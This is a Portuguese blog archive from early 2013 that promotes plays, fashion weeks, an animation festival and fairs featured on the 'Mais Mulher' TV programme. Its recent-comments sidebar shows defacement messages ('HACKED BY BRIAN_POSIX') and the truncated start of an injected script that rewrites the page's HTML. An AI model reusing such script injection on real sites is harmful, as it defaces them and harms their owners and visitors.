oqueaconteceporai @ 18:34

Qua, 20/03/13

Chove em Barcelona. Chove no Bairro Raval, antigo bairro Chino, local onde uma mescla imensa de povos e culturas se cruzam.


Chove no pequeno quarto de Lali, a prostituta, do chulo Carlos e de David, o cliente. Pessoas do Bairro a quem Pau Miró deu voz e transformou em personagens carregadas de sonhos e frustrações.

 

Em cena no Teatro Aloés de 26 de Março a 07 de Abril.

(Terça | quarta a sábado 21h30 e às domingo 16h)


Encenação de Jorge Silva
Interpretação de Anna Eremin, João de Brito e Luís Barros.

 

M16 - Bilhete normal: 5€ (sujeito a descontos)

 

Teatro dos Aloés www.teatrodosaloes.pt.

 

A não perder, no Mais Mulher desta quinta-feira às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 




Tags:


oqueaconteceporai @ 18:34

Ter, 19/03/13

Quando já todos suspiram pelo fim da chuva e do frio, o 32.º PORTUGAL FASHION VIBE cumpre a natureza visionária da moda e antecipa as tendências Outono-Inverno 2013-14 em quatro dias de desfiles, 20, 21, 22 e 23 de Março.

 

No dia 20, o arranque do evento tem lugar em Lisboa, à semelhança das edições transatas. Para a capital do país, estão programados dois desfiles de jovens criadores do Espaço Bloom (dedicado a designers emergentes), Susana Bettencourt e Hugo Costa, às 18h30, e Andreia Lexim, Estelita Mendonça e Daniela Barros, às 19h30, no Carpe Diem Arte e Pesquisa (Rua de O Século, 79, antigo Palácio Pombal), seguindo-se os desfiles dos consagrados Alves/Gonçalves (às 21h30, na Brand Gallery – Largo Vitorino Damásio, 1) e Fátima Lopes (às 22h30, no Convento do Beato).

 

A 32.ª edição do PORTUGAL FASHION, cujo tema é VIBE, prossegue nos dias 20, 21, 22 e 23 de março no Edifício da Alfândega do Porto, com um total de 26 desfiles de jovens designers (Espaço Bloom), estilistas consagrados e marcas de vestuário e calçado. Vão ser apresentadas as novas coleções de Luís Buchinho (com a sua marca Knitwear), Felipe Oliveira Batista, Anabela Baldaque, Miguel Vieira, Katty Xiomara, Júlio Torcato, Ricardo Preto (com a marca Meam), Diogo Miranda, Teresa Martins (para a TM Collection), Carlos Gil e Luís Onofre, a quem cabe encerrar o 32.º PORTUGAL FASHION VIBE.

 

Também merecem destaque os desfiles das marcas de vestuário Vicri, Lion of Porches e Dielmar, bem como as apresentações das marcas de calçado Nobrand, Fly London, Cohibas, Dkode, Goldmud + Alexandra Moura, J. Reinaldo e Silvia Rebatto.

 

Para o presidente da Comissão Executiva da ANJE, entidade organizadora do evento, “o 32.º PORTUGAL FASHION é uma demonstração de força e resiliência da Fileira Moda portuguesa. Numa conjuntura económica tão adversa, o PORTUGAL FASHION mantém um nível elevado de qualidade segundo os padrões internacionais e um programa de desfiles muito diversificado, que permite ao evento abarcar diferentes nichos da Fileira Moda. Por outro lado, continua a ser dada a oportunidade a jovens criadores de apresentarem os seus trabalhos, naquilo que é um contributo claro para a renovação geracional da moda portuguesa”, garante Manuel Teixeira.

 

O mesmo responsável sublinha, ainda, que “a opção pela repartição dos desfiles entre Lisboa e Porto é o renovar da aposta num modelo ganhador”. De facto, acrescenta, “a presença na capital do país tem permitido uma visibilidade acrescida a novos criadores e um reforço da notoriedade internacional da marca PORTUGAL FASHION, sem beliscar a histórica ligação do evento ao Porto, centro nevrálgico da Fileira Moda no nosso país”.

 

Por isso já sabe, não perca este evento de puro bom gosto e inovação, no Mais Mulher desta quarta-feira às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 


Tags:


oqueaconteceporai @ 18:31

Seg, 18/03/13

Um espetáculo musical que conta a história do lendário herói de máscara e espada. Projeto que reúne perto de 100 elementos, com um elenco de 18 atores e cantores, um cenário grandioso, figurinos de época, um investimento improvável em iluminação, som e sonoplastia, numa das mais emblemáticas salas do país, o Teatro Rivoli. São fatores que fazem de ZORRO um espetáculo imperdível!

ZORRO estrou na noite de carnaval com o Teatro Rivoli completamente esgotado! Em apenas 12 dias mais de 10.000 pessoas, entre miúdos e graúdos, aplaudiram bem alto este novo musical.

 

Esta é uma história sobre o herói que existe em cada um de nós, sobre a capacidade de aprender, de lutar por objetivos, de reerguer uma casa pela base quando o telhado cede.

Ao contrário de outros heróis, Zorro conquista a capa e a mascarilha não por magia ou mutações genéticas, mas porque se torna merecedor, por defender a honra de uma população, pela sua generosidade, esforço, e por descobrir que um herói não é só herói pelos outros mas COM os outros.

 

Começa mais um dia na Vila Garcia. Os habitantes enchem a praça de flores, de frutas, de especiarias. A alegria da manhã vem com o sol e os pregões dos vendedores. Mas eis que surgem os guardas de Dom Miguel, o governante da região, anunciando o corte ao acesso do poço que existe na Colina, a sua mansão. Em tempo de seca, quando a água se torna cada vez mais escassa e com o caminho para o poço vedado, como vão conseguir os Garcias continuar a manter as suas plantações e a fazer crescer a Vila?


É então que surge Zorro, o mais amado dos justiceiros. Zorro vem para acalmar a Vila, com a promessa de um futuro melhor. Acontece que Zorro está velho e cansado. As suas pernas já falham, e decide que é chegada a altura de treinar alguém para o substituir.


Mas quem? De entre todos os Garcias há apenas um rapaz franzino que se sobressai, pelos seus valores morais, pela sua honestidade. Mas este rapaz, Sancho, tem alguns receios e faz com que esse medo o impeça de seguir em frente na missão de auxiliar a Vila Garcia. Ao mesmo tempo, Dom Miguel descobre que há uma mina de ouro na Vila e o seu plano é precisamente tirar os Garcias das suas terras, para poder desenterrar esse ouro, enriquecendo ainda mais. Os Garcias, sem água, têm então de abandonar a Vila. Mas Sancho, empenhado em ajudar e movido pelo amor à sua terra, aceita finalmente vestir a capa e a mascarilha de Zorro e defender a população de Garcia.

 

Decidido a enfrentar Dom Miguel e a convencê-lo a voltar a deixar a população aceder à àgua do poço da Colina, apercebe-se que, pela iniciativa, pela coragem, pela justiça com que lida com os problemas, se está a transformar num herói de verdade.

 

Uma peça a não perder no Mais Mulher desta terça-feira às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 






Tags:


oqueaconteceporai @ 18:33

Qua, 13/03/13

O Teatro Rápido em Março abre portas com a oferta ao público de 4 micropeças ao final da tarde, 1 micropeça para a Infância nas manhãs de sábados e domingos, 1 Exposição de Fotografia em homenagem a Espaços Teatrais e ainda vários eventos no TR BAR.

Contrariando o hábito de nos encontrarmos encerrados às 4ªs, celebraremos o Dia Mundial do Teatro, a 27 de Março, abrindo portas nesse dia para 2 sessões por cada sala TR em horário noturno, entre as 21h30 e as 22h20 4 salas, 2 sessões por sala!

O tema de Março é EM NOME DO PAI! E que nos traz uma diversificada e divertida proposta de programação:

Mulheres que em nome de um pai, gritam.
Uma Bíblia que “em nome do pai” se escreveu e se brinca.
Homens cujas ações são levadas a cabo em nome dos (respetivos) pais. Pais cujas existências são questionadas, dando lugar a uma reflexão sobre caminhos escolhidos.
E ainda uma party em formato de discoperformance liderada por um homo machina.

Albano Jerónimo estreia-se no TR num espetáculo com texto e conceção de Cláudia Lucas Chéu. Eric L da Silva assinala o seu regresso ao TR enquanto ator e encenador ao lado de Gonçalo Oliveira, tendo numa das salas vizinhas dois jovens atores, Miguel Ponte e Ricardo Tavares que contarão com o apoio à encenação de Marcantonio Del Carlo.

Joana Paes de Freitas ao lado Catarina Aidos e Catarina Campos Costa, trazem-nos uma criação coletiva.
Com uma proposta para a infância A. Branco volta a escrever para uma criação com Pedro Oliveira e Sabrina Martinho.

 

As peças a que pode assistir são:

 

- "Folhas, e não Credos";
- "Exorcismo: Uma História de Amor";
- "Submersas";
- "Europa, Ich Liebe Dich";
- "Duas Margens"

E não deixe de visitar o blog do TR e consulte a programação.

http://teatrorapido.blogspot.pt/

 

Por isso não deixe escapar e este mês e vá ao teatro! E não perca o Mais Mulher desta quinta-feira, às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 


Tags:


oqueaconteceporai @ 18:30

Qua, 06/03/13

Custódia Gallego, Filipe Duarte, João Cabral, Lúcia Moniz, Manuel Cavaco e Sofia Nicholson, foram desafiados pelo arrojo e pela saudade de palco. O convite de Renato Godinho, que encena o espectáculo, proporcionou uma inesperada comunhão de vontades e desejos que levou este maravilhoso grupo de actores a pegar numa história de Yasmina Reza, a primeira que escreveu para Teatro, e a viverem uma família de personagens à procura de paz.

 

Contrastando com a busca familiar que caracteriza o enredo da peça, está a determinação das pessoas que dão vida a este projecto em contrariar o cinzentismo teimoso e o conformismo viral. Sem subsídios, sem uma grande produtora por trás, mas com a inabalável determinação de quem sabe o que quer, e ama o que faz.

 

Este é a história de “Conversas Depois de um Enterro”: O patriarca Simão Aguilar faleceu, e, de acordo com os seus desejos, acaba de ser enterrado, não ao lado da sua mulher, no cemitério, mas nas suas próprias terras.

 

Reunidos estão os três filhos, todos nos seus quarenta anos: Jaime (joão Cabral), Edite (Sofia Nicholson) e Alex (Filipe Duarte). Também lá estão Pedro (Manuel Cavaco), o tio do lado da mãe, e a sua mulher, Júlia (Custódia Gallego), bem como Elisa (Lúcia Moniz). Elisa é a “outsider” apesar de ter sido namorada de Alex, quem ela amava realmente era o seu irmão Jaime. O que se desenrola a partir daqui, é um enredo familiar, com muitos momentos de humor. Há as tensões que são expectáveis em qualquer reunião de família, e os esforços para chegar a termos.

 

Com o passado, presente e futuro. Ao pai é dado o descanso, mas a sua presença ainda é sentida. À medida que alguns factos inesperados são revelados, a imagem que a família tinha do pai, transforma-se. É aqui onde os valores familiares são construídos, que o vazio deixado pelo falecido dá lugar à comunhão por que todos ansiavam há muito.

 

“Conversas Depois de um Enterro”, de Yasmina Reza, é apresentado pelo Montepio, tem encenação de Renato Godinho, e interpretação de Custódia Gallego, Filipe Duarte, João Cabral, Lúcia Moniz, Manuel Cavaco e Sofia Nicholson e estará em cena de 1 a 17 de Março no Teatro Municipal Mirita Casimiro, no Estoril, de onde partirá para uma digressão pelo país.

 

Os espectáculos são de 5ª a Sábado às 21h30 e Domingo às 16h. Os bilhetes estão à venda nos locais habituais com o preço a variar entre os 10 e os 15€.

 

Por isso já sabe! Não perca esta antevisão com Renato Godinho, Sofia Nicholson e Custódia Gallego. No Mais Mulher desta quinta-feira às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 


Tags:


oqueaconteceporai @ 18:30

Seg, 04/03/13

Brasil e Espanha, unidos pela Monstra 2013.

 

Pela primeira vez, a MONSTRA - Festival de Cinema de Animação de Lisboa irá homenagear a cinematografia de dois países, naquela que será a maior edição do Festival e que, este ano, se realiza entre 7 a 17 de Março.

 

O programa da 12ª edição da Monstra, que irá decorrer entre 7 e 17 de Março de 2013, vai ser marcado pela retrospectiva às cinematografias brasileira e espanhola, que, segundo Fernando Garlito, director artístico do festival são “muitos mais ligadas à sua etnologia e etnografia, do que outras cinematografias internacionais”.

 

O festival começa a 7 de Março com a retrospectiva do Brasil, exibindo mais de 100 filmes deste país e homenageando o realizador Chico Liberato, que apresentará em Lisboa toda a sua obra, desde o “Boi Aruá”, de 1983 (realiza, em 2013, o seu 30º aniversário) à sua mais recente longa “Ritos de Passagem”, uma estreia europeia.

 

A partir do dia 11 de Março, o festival debruça-se sobre o cinema de animação espanhol, com programas do País Basco, Comunidade Autónoma de Madrid, Galiza, Valência, Catalunha e uma homenagem a Segundo de Chomón, realizador espanhol, contemporâneo de George Méliès, que, para além de trucagens realizou ainda múltiplas animações, que serão apresentadas no programa do festival.

 

Uma novidade desta 12ª edição do festival, é a criação do “Prémio Produção”, que visa galardoar o melhor projecto de filme português. Este ano a competição é dedicada às longas-metragens, havendo também as habituais secções de competição de estudantes, curtíssimas e, pelo segundo ano consecutivo, a competição Portuguesa, com o Prémio SPA | Vasco Granja.

 

À semelhança de edições anteriores, a Monstrinha – a Monstra dos mais novos – volta ter grande destaque no programa do festival, com sessões durante a semana em várias escolas da cidade Lisboa e, com filmes ao fim de semana para pais e filhos, entre os quais se destacam “O Grilo Feliz e os Insectos Gigantes” e “Os Brichos”, duas longas-metragens brasileiras.

 

Por isso já sabe, não perca esta exclusiva antevisão no Mais Mulher desta terça-feira às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 


Tags:


oqueaconteceporai @ 18:36

Sex, 01/03/13

A ModaLisboa Trust está a chegar e é com o maior orgulho que anunciamos o calendário de desfiles, que se prolongará por três dias intensos de exposição do melhor da indústria da moda no nosso país.

 

Apresentamos o trabalho de dezoito criadores nacionais e da guest designer polaca Monika Ptaszek, no âmbito do protocolo de intercâmbio com a FashionPhilosophy, Fashion Week Poland.

 

A próxima edição da Lisboa Fashion Week inicia na sexta-feira, 8 de março, às 18 horas, com as propostas de Valentim Quaresma, na Galeria dos Paços de Concelho. A Câmara Municipal de Lisboa abre novamente as suas portas à apresentação e à consagração dos nossos criadores.

 

O grande evento da indústria da moda em Portugal instala-se no Pátio da Galé, no sábado e no domingo, num horário freneticamente preenchido ao ritmo do trabalho, da aposta e da criatividade de uma indústria que não se deixa contrair.

 

A confiança na indústria da moda é a nossa escolha. Não hesitamos. Acreditamos.

 

Nos dias 8, 9 e 10 de março de 2013, a ModaLisboa regressa ao Pátio da Galé para apresentar as coleções outono/inverno 13/14 dos nossos principais criadores.

 

TRUST é o tema desta edição do maior evento da indústria de Moda em Portugal. A ele nos subordinamos. E com ele nos insubordinamos.

 

TRUST porque é de confiança que se trata no mundo de hoje. A confiança é uma escolha. É a nossa escolha. Respondemos com ação à contração. Acreditamos. Vamos fazer.

 

TRUST porque ousados e resolutos faremos desta edição da Moda Lisboa um manifesto contra a rendição.

 

TRUST porque não se pode parar. Confiamos no ofício da Moda em Portugal. Porque somos muitos. E somos bons.

 

TRUST porque com as pessoas certas, no caminho certo, sob a luz certa, vamos dar visibilidade a novas redes, a novos conteúdos, a novas ideias, a novos negócios. Partilharemos o que temos de melhor.

 

TRUST porque investimos em quem investe. E em quem cria. Entregamo-nos. Revelamo-nos. Ousamos.

 

TRUST porque o mundo mudou e nós com ele.

 

TRUST porque temos o dever da insolência. E o da sedução. MODALISBOA TRUST por mil razões.

 

Por isso não pode mesmo perder esta antevisão exclusiva no Mais Mulher desta segunda-feira, às 17.30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 


Tags:


oqueaconteceporai @ 18:35

Ter, 26/02/13

Maior salão nacional dedicado ao sector do turismo está no Parque das Nações até 3 de Março!

 

Falta pouco menos de uma semana para a abertura oficial da 25ª edição da BTL – Feira Internacional de Turismo. De 27 de Fevereiro a 3 de Março, a Feira Internacional de Turismo abre as portas a profissionais e grande público, para mais uma edição que se prevê de grande sucesso. A comemorar 25 anos de existência a BTL irá ultrapassar nesta edição o milhão de visitantes.

 

Organizada pela AIP – Feiras, Congressos e Eventos, a edição comemorativa dos 25 anos arranca para os profissionais dia 27 de Fevereiro às 10 horas, abrindo ao público dia 1 de Março, a partir das 18h00 e durante todo o fim de semana.

 

Este ano conta com a presença de 36 destinos internacionais, e oito regiões nacionais entre elas o Destino Nacional Convidado, o Turismo Centro de Portugal. Todos eles dão a conhecer o melhor das suas regiões, gastronomia, hotelaria, cultura, costumes e tradições.

 

Nesta edição estreiam-se os destinos EUA, La Formentera e São Paulo e estão de volta os destinos Argentina e e Extremadura. Está já prevista a presença de mais de 900 empresas, em linha com o número de empresas presentes na edição de 2012, ocupando este ano 3 pavilhões.

 

Não perca esta viajem pelo mundo sem sair de Lisboa, no Mais Mulher desta quarta-feira, às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 




oqueaconteceporai @ 18:33

Ter, 19/02/13

A Escola Secundária de Sacavém recebe nos próximos dias 23 e 24 de Fevereiro a 3ª Edição do Mundo Giro.

 

A maior feira de brinquedos usados está de volta, agora num espaço maior e com mais atividades para as crianças. Um evento desenhado para ensinar aos mais novos, de uma forma divertida, noções de partilha, responsabilidade social, valor, e principalmente a gerir o seu dinheiro.

 

Dirigido a famílias com crianças entre os 2 e os 10 anos de idade, o evento decorre das 10h00 às 18h00.

 

Por isso já sabe, não perca esta iniciativa, no Mais Mulher desta quarta-feira, às 17:30 na SIC Mulher!

 

Mas se não viu. Veja o vídeo aqui!

 




oqueaconteceporai @ 18:35

Qua, 13/02/13

No mês em que se comemora o Dia de São Valentim, o Teatro Rápido oferece-lhe quatro peças de 15 minutos para ser apaixonar. Sob o tema de Por Amor, tudo aqui vai ser permitido. Porque ninguém gosta de estar sozinho, porque todos sonham em encontrar a outra metade da laranja.

 

O problema é quando os sonhos se tornam realidade. Sim! Porque às vezes os sonhos concretizados revelam ser o maior problema…

 

Curiosa!?! Então não perca o Mais Mulher desta quinta-feira, às 17:30 na SIC Mulher.

 

Com Tiago Torres da Silva e Rosa Maria Villa!

 

Mas se não viu. Veja o vídeo aqui!

 


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO